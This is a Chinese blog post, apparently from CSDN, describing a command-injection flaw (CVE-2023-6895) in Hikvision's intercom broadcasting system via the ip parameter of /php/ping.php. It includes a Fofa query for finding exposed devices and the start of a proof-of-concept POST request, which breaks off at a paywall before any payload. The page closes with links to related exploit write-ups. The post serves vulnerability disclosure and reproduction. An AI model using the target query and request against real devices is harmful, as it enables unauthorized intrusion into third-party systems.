海康威视对讲广播系统RCE漏洞(CVE-2023-6895)

已于 2024-03-09 20:55:22 修改
阅读量229 收藏
点赞数
分类专栏: 漏洞复现 文章标签: web安全
于 2024-03-09 20:50:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43567873/article/details/136590685
版权
本文介绍了海康威视对讲广播系统3.0.3_20201113_RELEASE(HIK)版本存在的操作系统命令注入漏洞,该漏洞存在于文件/php/ping.php的jsondata[ip]参数中,可能导致远程命令执行。影响版本为Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)。文章还提供了漏洞复现的方法和POC。
摘要由CSDN通过智能技术生成

简介

IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对讲广播系统。

漏洞描述

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。

影响版本

Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)
 


Fofa语法:

icon_hash=“-1830859634”

漏洞复现

使用以下POST数据包执行命令

POST /php/ping.php HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=
了解本专栏 订阅专栏 解锁全文 超级会员免费看
今天晚上早睡觉
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
订阅专栏
海康威视iVMS综合安防系统文件上传漏洞复现
The current road is different, love needs to distinguish between right and wrong
11-02 514
海康威视iVMS集中监控应用管理平台,是以安全防范业务应用为导向,以视频图像应用为基础手段,综合视频监控、联网报警、智能分析、运维管理等多种安全防范应用系统,构建的多业务应用综合管理平台。没有人规定,一朵花一定要成长为向日葵或者玫瑰。
CVE-2023-6895海康威视广播系统远程命令执行漏洞复现 [附POC]
薛定谔嘚喵博客
12-22 700
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
漏洞复现--海康威视IP网络广播系统远程命令执行
qq_53003652的博客
01-03 829
海康威视网络广播系统海康威视提供的安防解决方案的一部分,用于管理和实现对广播功能。该产品存在远程命令执行漏洞,攻击者可通过此漏洞获取服务器权限。IP网络广播系统
1day海康威视综合安防管理平台多个RCE远程代码执行漏洞
weixin_43167326的博客
06-11 1204
海康威视部分综合安防管理平台管理平台基于 " 统一软件技术架构" 理念设计,采用业务组件化技术,满足平台在业务上的弹性扩展。该平台适用于全行业通用综合安防业务,对各系统资源进行了整合和集中管理,实现统一部署、配置、管理和调度,可以对接入的视频监控点集中管理,实现统一部署、统一配置、统一管理和统一调度。
基于iFIX和海康威视摄像机的选煤厂语音广播报警系统
05-28
随着选煤厂集控系统规模扩大,集控人员和现场岗位人员的工作强度不断增加的问题,提出将集控系统中的设备报警和启停操作信息,通过语音广播方式实时播放的设计方案。当集控系统上位机组态软件iFIX监控到设备发生故障或进行启停操作时,可将激活语音播报程序进行实时播报,并通过工业电视系统中的海康威视摄像机,及时了解设备的故障原因和启停操作状态。实际应用表明效果良好。
Hikvision SPON IP网络广播系统存在命令执行漏洞CVE-2023-6895 附POC软件
nnn2188185的博客
12-27 848
Hikvision SPON IP网络广播系统存在命令执行漏洞CVE-2023-6895 附POC软件
海康威视IP网络广播系统命令执行漏洞(CVE-2023-6895)
Keepb1ue的博客
12-20 2169
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
CVE-2017-7921海康威视配置文件解码(configfile解码)
12-11
具体影响产品型号,请参考CVE-2017-7921;CVE-2017-7922漏洞详情。该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。(ps:工具不会使用可以私信我,直接差评的一律自理)
hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip
05-20
标题 "hikvision_CVE-2017-7921_auth_bypass_config_decryptor-main.zip" 指向的是一个与海康威视(Hikvision)设备相关的安全漏洞,具体是CVE-2017-7921认证绕过漏洞。这个压缩包可能包含一个工具或指南,用于解析...
hikvision_CVE-2017-7921配置文件解密.rar
05-20
具体影响产品型号,请参考CVE-...CVE-2017-7922漏洞详情。 该程序发布,意在警醒相关单位及时更新相关设备,网络安全需要大家共同监督。 本程序需和配置文件存放在同一目录下运行exe即可配置文件名configurationFile
海康威视demo - ClientDemo-NetBeansPro.rar
05-17
海康威视SDK Java Demo详解与应用》 海康威视,作为全球领先的安防产品及解决方案提供商,其SDK(Software Development Kit)为开发者提供了强大的工具集,使得开发者能够便捷地进行设备控制、视频流处理等功能的...
Hikvision SPON IP网络广播系统命令执行漏洞
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
02-26 521
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。tips:这里的图有点问题,转码这个好像是他服务器的原因,我试过yakit和bp都是这样,而且我从来没改过这两软件的编码配置。python ./Hikvision SPON IP网络广播系统命令执行.py -f ./url.txt。
海康威视越权访问CVE-2021-7921漏洞复现
归零者的博客
10-31 5490
海康威视越权访问CVE-2021-7921漏洞复现
漏洞复现】Hikvision SPON IP网络广播系统命令执行漏洞(CVE-2023-6895)
做自己喜欢的事,并将其发挥到极致!
01-19 1176
Hikvision Intercom Broadcasting System是中国海康威视(Hikvision)公司的一个对广播系统。Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
海康摄像头CVE-2021-36260漏洞复现
qq_50854662的博客
01-09 7998
海康摄像头CVE-2021-36260漏洞复现
海康威视广播系统 RCE漏洞复现(CVE-2023-6895)
0xSec
12-20 1501
Hikvision Intercom Broadcasting System 3.0.3_20201113_RELEASE(HIK)版本存在操作系统命令注入漏洞,该漏洞源于文件/php/ping.php的参数jsondata[ip]会导致操作系统命令注入。
漏洞复现】Hikvision摄像头产品代码执行漏洞(CVE-2021-36260)
晚风不及你
01-20 3800
Hikvision(海康威视)是一家在中国颇具影响力的安防公司,其网络摄像头产品在市场上占据了相当大的份额。Hikvision的网络摄像头产品线非常丰富,涵盖了各种型号和功能,以满足不同用户的需求。
fastjson-rce复现
weixin_49608140的博客
09-14 197
fastjson笔记
CVE-2023-6378
最新发布
06-22
CVE-2023-6378是一个安全漏洞的标识符,通常用于记录软件中的安全缺陷。这些标识符由Common Vulnerabilities and Exposures (CVE)项目维护,CVE-2023-6378具体指的是某个时间段内发现的某个产品的漏洞。由于我是一个基于历史信息的模型,我可能无法提供实时的漏洞详情,因为我的训练数据截止日期是2023年,而CVE编号是按照年度和顺序分配的,新的漏洞会不断被发现。 通常,CVE描述会包含以下内容: - **影响范围**:受影响的软件或系统类型。 - **漏洞细节**:攻击者如何利用这个漏洞,可能涉及什么样的攻击向量。 - **严重程度**:漏洞可能导致的影响,如是否可被远程利用、是否可能导致数据泄露等。 - **修补建议**:厂商提供的修复措施或安全更新。 如果您想了解CVE-2023-6378的具体情况,建议查看最新的安全公告、厂商发布的安全通告或是使用专门的CVE数据库进行查询,以获取最准确的信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值